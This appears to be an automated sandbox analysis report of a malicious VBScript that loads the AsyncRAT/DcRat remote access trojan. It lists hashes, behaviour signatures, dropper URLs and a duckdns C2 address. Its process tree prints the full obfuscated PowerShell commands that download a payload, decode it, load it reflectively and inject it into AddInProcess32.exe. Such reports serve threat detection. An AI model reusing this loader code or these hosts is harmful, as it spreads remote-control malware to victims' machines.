Analysis

  • max time kernel
    142s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-11-2024 07:13

General

  • Target

    asegurar.vbs

  • Size

    139KB

  • MD5

    b6a19737eef49bc1fda3686ea04fefd2

  • SHA1

    e4f14e237fcd865694ce29862f58c063c0efe995

  • SHA256

    93db398a854042d2a23e61cd308a05d21fb85a6b5c28206c585a6221ac583cd6

  • SHA512

    03145176ca0d828034a4c6907213bcf6478a64134a9fd7a79026ea5ae250dc79d43da1d0cb005e18d0be4bb46373d36302f7369bfc5457be745ba3f50072e887

  • SSDEEP

    3072:boU4gHKIuQzOTbEeqZfCPgyoL4EairFgt5pJGwm:bLKAubqZTyo9

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

exe.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Tar22

C2

7014vj.duckdns.org:8000

Mutex

DcRatMutex_qwsafun

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\asegurar.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2648
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnUnZpaW1hZ2VVcmwgPSBpOHhodHRwczonKycvLzEwMTcuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9mJysnaWxla2UnKyd5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXAnKydUOXBnU1NsdlN0R3JuVElDZkZobVRLajNMJysnQzZTUXRJY09jX1QzNXcmcGtfdmlkPWZkNGY2MTRiYjIwOWMnKyc2MmMxNzMwOTQ1MTc2YTA5MDRmICcrJ2k4eDtSdml3ZWJDbGllbnQnKycgPSBOZXctT2JqZWMnKyd0IFN5c3RlbS5OZXQuV2ViQ2xpZW50JysnO1J2aWltYWdlQnl0ZXMgPSBSdml3ZWJDbGllbnQuRG93bmxvYWREYXRhKFJ2aWltYWdlVXJsKTtSdmlpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVJysnVEY4LkdldFN0cmluZycrJyhSdmlpJysnbWFnZUJ5dGVzKTtSdmlzdGFydEZsJysnYWcgPSBpOHg8PEJBU0U2NF9TVEFSVD4+aTh4JysnO1J2aWVuZEYnKydsYWcgPSBpOHg8PEJBUycrJ0U2NF9FTkQ+Pmk4eDtSdmlzdGFydEluZGV4ID0gUnZpaW1hZ2VUZXh0LkluZGV4T2YoUnZpc3RhcicrJ3RGbGFnKTtSdmllbmRJbmRleCA9IFJ2aWltYWdlVGV4dC5JbmRleE9mKFJ2aWVuJysnZEZsYWcpO1J2aXN0YXJ0SW5kZXggLWdlIDAgLWFuZCBSdmknKydlbmRJbmRleCAtZ3QgUnZpc3RhcnRJbmRleDtSdmlzdGFydEluZGV4ICs9IFJ2aXN0YXJ0RmxhZy5MZW5ndGg7UnZpJysnYmFzZTY0TGVuZ3RoID0gUnZpZW5kSW5kZXggLSBSdmlzdGFydEluZGV4O1J2aWJhc2U2NENvbW1hbmQgPSAnKydSdmlpbWFnZVRlJysneHQuU3Vic3RyaW5nKFJ2aXN0YXJ0SW5kZXgsIFJ2aWJhc2U2NExlbmd0aCk7UnZpYmFzZScrJzY0UmV2ZXJzZWQgJysnPSAtam9pbiAoJysnUnZpYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFRGWCBGb3JFYWNoLU9iamVjdCB7IFJ2aV8gfSlbLTEuLi0oUnZpYmEnKydzZTY0Q29tJysnbWFuZC5MZW5ndGgpJysnXTtSdmljb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKFJ2aWJhc2U2JysnNFJldmVyc2VkKTtSdmlsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbCcrJ2VjdGlvbi5Bc3NlbWJseV06OkxvYWQoUnZpY29tbWFuZEJ5dGVzKTtSdml2YWlNZXRob2QgPSBbJysnZG4nKydsaWIuSU8uSG9tZV0uR2V0TWV0aG9kKGk4eFZBSWk4eCk7UnZpdmFpTWV0aG9kLkludm9rZShSdmludWxsLCBAKCcrJ2k4eDAvM3hRYnUvZC9lZS5ldHNhcC8vOnNwdHRoaTh4LCBpOHhkZXNhdGl2YWRvaTh4LCBpOHhkZScrJ3NhdGl2YWRvaTh4LCBpOHhkZXNhdGl2YWRvaTh4LCBpOHhBZGRJblByb2Nlc3MzMmk4eCwgaTh4JysnZGVzYXRpdmFkb2k4eCwgJysnaTh4ZGVzYXRpdmEnKydkb2k4eCxpOHhkZXNhdGl2YWRvaTh4LGk4eGRlc2F0aXZhZG9pOHgsaTh4ZGVzYXRpdmFkb2k4eCxpOHhkZXNhdGl2YWRvaTh4LGk4eGRlc2F0aXZhZG9pOHgnKycsaTh4MWk4eCcrJyxpOHhkZXNhdGl2YWRvaTh4KSk7JykgIC1yRXBsYWNFKFtDaEFSXTg0K1tDaEFSXTcwK1tDaEFSXTg4KSxbQ2hBUl0xMjQgIC1DUmVQTGFDRSAnaTh4JyxbQ2hBUl0zOS1DUmVQTGFDRSAgKFtDaEFSXTgyK1tDaEFSXTExOCtbQ2hBUl0xMDUpLFtDaEFSXTM2KSB8IC4gKCAkRW52OmNvbVNQZUNbNCwxNSwyNV0tSm9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4756
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('RviimageUrl = i8xhttps:'+'//1017.filemail.com/api/file/get?f'+'ileke'+'y=2Aa_bWo9Reu45t7BU1kVgsd9p'+'T9pgSSlvStGrnTICfFhmTKj3L'+'C6SQtIcOc_T35w&pk_vid=fd4f614bb209c'+'62c1730945176a0904f '+'i8x;RviwebClient'+' = New-Objec'+'t System.Net.WebClient'+';RviimageBytes = RviwebClient.DownloadData(RviimageUrl);RviimageText = [System.Text.Encoding]::U'+'TF8.GetString'+'(Rvii'+'mageBytes);RvistartFl'+'ag = i8x<<BASE64_START>>i8x'+';RviendF'+'lag = i8x<<BAS'+'E64_END>>i8x;RvistartIndex = RviimageText.IndexOf(Rvistar'+'tFlag);RviendIndex = RviimageText.IndexOf(Rvien'+'dFlag);RvistartIndex -ge 0 -and Rvi'+'endIndex -gt RvistartIndex;RvistartIndex += RvistartFlag.Length;Rvi'+'base64Length = RviendIndex - RvistartIndex;Rvibase64Command = '+'RviimageTe'+'xt.Substring(RvistartIndex, Rvibase64Length);Rvibase'+'64Reversed '+'= -join ('+'Rvibase64Command.ToCharArray() TFX ForEach-Object { Rvi_ })[-1..-(Rviba'+'se64Com'+'mand.Length)'+'];RvicommandBytes = [System.Convert]::FromBase64String(Rvibase6'+'4Reversed);RviloadedAssembly = [System.Refl'+'ection.Assembly]::Load(RvicommandBytes);RvivaiMethod = ['+'dn'+'lib.IO.Home].GetMethod(i8xVAIi8x);RvivaiMethod.Invoke(Rvinull, @('+'i8x0/3xQbu/d/ee.etsap//:sptthi8x, i8xdesativadoi8x, i8xde'+'sativadoi8x, i8xdesativadoi8x, i8xAddInProcess32i8x, i8x'+'desativadoi8x, '+'i8xdesativa'+'doi8x,i8xdesativadoi8x,i8xdesativadoi8x,i8xdesativadoi8x,i8xdesativadoi8x,i8xdesativadoi8x'+',i8x1i8x'+',i8xdesativadoi8x));') -rEplacE([ChAR]84+[ChAR]70+[ChAR]88),[ChAR]124 -CRePLaCE 'i8x',[ChAR]39-CRePLaCE ([ChAR]82+[ChAR]118+[ChAR]105),[ChAR]36) | . ( $Env:comSPeC[4,15,25]-JoiN'')"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:5068
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4424

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    f41839a3fe2888c8b3050197bc9a0a05

    SHA1

    0798941aaf7a53a11ea9ed589752890aee069729

    SHA256

    224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

    SHA512

    2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    64B

    MD5

    5caad758326454b5788ec35315c4c304

    SHA1

    3aef8dba8042662a7fcf97e51047dc636b4d4724

    SHA256

    83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

    SHA512

    4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mbvos5xu.ua0.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/4424-25-0x0000000000400000-0x0000000000412000-memory.dmp

    Filesize

    72KB

  • memory/4756-0-0x00007FFBAC563000-0x00007FFBAC565000-memory.dmp

    Filesize

    8KB

  • memory/4756-1-0x0000025579E80000-0x0000025579EA2000-memory.dmp

    Filesize

    136KB

  • memory/4756-11-0x00007FFBAC560000-0x00007FFBAD021000-memory.dmp

    Filesize

    10.8MB

  • memory/4756-12-0x00007FFBAC560000-0x00007FFBAD021000-memory.dmp

    Filesize

    10.8MB

  • memory/4756-22-0x00007FFBAC563000-0x00007FFBAC565000-memory.dmp

    Filesize

    8KB

  • memory/4756-23-0x00007FFBAC560000-0x00007FFBAD021000-memory.dmp

    Filesize

    10.8MB

  • memory/4756-31-0x00007FFBAC560000-0x00007FFBAD021000-memory.dmp

    Filesize

    10.8MB

  • memory/5068-24-0x000002796CA70000-0x000002796CBC8000-memory.dmp

    Filesize

    1.3MB